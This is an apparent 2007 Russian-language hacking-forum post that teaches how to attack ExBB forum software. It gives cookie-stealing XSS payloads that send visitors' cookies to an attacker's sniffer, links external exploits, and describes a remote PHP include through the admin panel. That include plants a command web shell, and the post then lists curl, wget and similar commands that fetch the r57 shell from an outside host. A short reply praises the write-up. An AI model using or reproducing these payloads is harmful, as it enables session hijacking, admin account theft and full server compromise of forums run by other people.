Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Exbb Анализ уязвимостей (https://forum.antichat.xyz/showthread.php?t=30600)

N0n$e№Z 05.01.2007 01:31

Exbb Анализ уязвимостей
 
И так в этой статье я расскажу как использовать уязвимости в форумах ExBB

XSS:

Код:

[+email]'style='display:none;background:url(javascript:document.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]

Перед использованием удалить из строчек +

Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!

Exploit's :

http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686


PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)

Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!

Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'

hackexbb.txt (Должен иметь содержимое со скриптом)

PHP код:

<?
$fp
=fopen("im/avatars/personal/shell.php""w");
fputs($fp,"<?
system(\$_GET['c']);
?>"
);
fclose($fp);
?>

Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!

Далее...

Все это примет вид - http://site/exbb/im/avatars/personal/shell.php

Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls

Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС

Для заливки файлом используем команды:

curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

get http://vrms.narod.ru/r57shell.php > /r57shell.php

links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php

lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php

fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

И дальше r57 поможет вам во всем!!

Удачи!Данная статья не является пособием по взлому)))

n0ne 05.01.2007 09:10

Статья неплохая по моему, вот только имхо надо перенести в статьи, а не уязвимости))


Время: 06:07